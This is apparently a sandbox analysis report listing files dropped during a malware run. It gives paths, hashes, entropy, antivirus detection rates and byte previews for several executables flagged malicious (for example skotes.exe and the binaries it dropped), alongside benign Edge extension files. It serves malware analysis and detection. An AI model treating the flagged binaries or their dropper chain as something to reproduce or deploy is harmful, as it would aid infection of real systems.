C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1769472
Entropy (8bit):	7.943218173874822
Encrypted:	false
SSDEEP:	49152:2qeXRL9h088NVvIYmSe9Mzeuo20b8pjNIGDuP:XEL30zNVbjDzeuoYjZDu
MD5:	38F7509D769058697F81EF17CFBE8C87
SHA1:	38E2634C714FCCF57EA1D5B27188F2C77F86E2DB
SHA-256:	DAF5EC940FDE5A1DF665A7240A0E27D3C39DA5B62D4D1935579158FA2A095B00
SHA-512:	06E70D5F8CB7BB447A8D6A0E961186CF2928A06CBBDC0AC5A4E5845E896F8E104752BC64EE089BD7CEF6BE20DC1C3F655FA07BEEB0B81CC47E606BB47CD5BF9F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..k..k..k.'k..k..k..k.&k..k...k..k...k..k...j..k..k..k.#k..k..k..kRich..k........................PE..L...O./g.....................@".......h...........@..........................@h.....m8....@.................................M.$.a.............................$..................................................................................... . ..$......b..................@....rsrc ......$......r..............@....idata ......$......r..............@... ..)...$......t..............@...vzzebkzr.p....N..b...v..............@...ojovyesw......h.....................@....taggant.0....h.."..................@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2825728
Entropy (8bit):	6.494615403090633
Encrypted:	false
SSDEEP:	49152:wLu0rFwlFtoqAWB3E7iqg2FjXbFZbR0t9P1O1C:wLu0rFgtoqAW67pjLFZF89E1
MD5:	954CC441DB8729CB9F76FDA40FE5B13A
SHA1:	137D1F5FD4778C4BD49D98F63428A985485BCFAA
SHA-256:	C2494F884675BDA9996B5A1A777C345E73392EB6C0D0ED2ECCAAAEA0514A912D
SHA-512:	8A64D8B047E83C364B50C7E1935EFACC782BEAF033917210EBDA1DB9C9679B3AA992C3B0BCBC38DA93E374D708B0D4409A81BDD4BC43D8A1CCAEC392035703F1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. ........................+.......+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...rhdvqhbi...........:..............@...ucfxntef. ...`+....................@....taggant.@....+..".................@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\452da5c2-271e-4552-a0df-452a5096330a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\8aca5069-c560-4c71-8920-f22cc2091944.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
Category:	dropped
Size (bytes):	76321
Entropy (8bit):	7.996057445951542
Encrypted:	true
SSDEEP:	1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
MD5:	D7A1AC56ED4F4D17DD0524C88892C56D
SHA1:	4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
SHA-256:	0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
SHA-512:	31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
Malicious:	false
Preview:	...........m{..(.}...7.\...N.D.w..m..q....%XfL.I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'..."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g..^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D\|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

C:\Users\user\AppData\Local\Temp\a490652f-dafc-43f6-861f-de5b196b51ba.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\a5e526d1-b74e-4ced-9fb1-02993bfd0850.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	206855
Entropy (8bit):	7.983996634657522
Encrypted:	false
SSDEEP:	3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
MD5:	788DF0376CE061534448AA17288FEA95
SHA1:	C3B9285574587B3D1950EE4A8D64145E93842AEB
SHA-256:	B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
SHA-512:	3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\DocumentsDHCAECGIEB.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3258368
Entropy (8bit):	6.666524898382995
Encrypted:	false
SSDEEP:	98304:FfTOPH8V6aHt8aRSceVZdqjolGQst+BjaPFLsy:MbatIjaPFLs
MD5:	571952385750F4874BB235D9E5E61120
SHA1:	EE1F74C0E61BABC831F50FA78C1F9554BC89F145
SHA-256:	614B9728AACD01AC0921F1FF51151D0F64426239B0F1C956FC18E05F0917F33C
SHA-512:	4F584B0376978DDEE7DCF7547B21B5645A6D785CCC92FF7E0FD1DF9DE17880AD0C7C824A32317FD38109824E436B7A7A555EC5676D5D49156DAB1B36CEDAC065
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.......2...@.................................W...k.............................1.............................l.1..................................................... . ............................@....rsrc...............................@....idata ............................@...brbzgqah..+.......*.................@...rlxxbpej......1.......1.............@....taggant.0....1.."....1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\cc71ba2d-bd7c-41f3-8524-d92b818f48c8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2110
Entropy (8bit):	5.404552630796695
Encrypted:	false
SSDEEP:	48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rrq:8e2Fa116uCntc5toYEfUUiM
MD5:	C7120ACC46540ADB7774DE5CB57A4A69
SHA1:	252BFDCE07E62AB58FF09B76E9727508B1A5FC11
SHA-256:	BA5144BD930FCEDD7B378A833CB2360F4D00CBF18E1B989981441C6AF73ADF29
SHA-512:	5A13487F96567B51D7FBCC64B3A468F0A54E66CC155DC0664BA5CB8692FEEB849AB1676FC880EA6836A5F2F716C5FF3D5F2A515698A332562A0550AC7F3110F7
Malicious:	false
Preview:	{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

C:\Users\user\AppData\Local\Temp\f1bb5283-9519-4a51-9b89-0d0aa6591a97.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	135771
Entropy (8bit):	7.802585890890899
Encrypted:	false
SSDEEP:	3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
MD5:	DA75BB05D10ACC967EECAAC040D3D733
SHA1:	95C08E067DF713AF8992DB113F7E9AEC84F17181
SHA-256:	33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
SHA-512:	56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.\|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?."...9M......[0Y0....H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

C:\Users\user\AppData\Local\Temp\scoped_dir7216_1434999662\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir7216_1434999662\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7216_1434999662\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir7216_1434999662\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_1434999662\cc71ba2d-bd7c-41f3-8524-d92b818f48c8.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
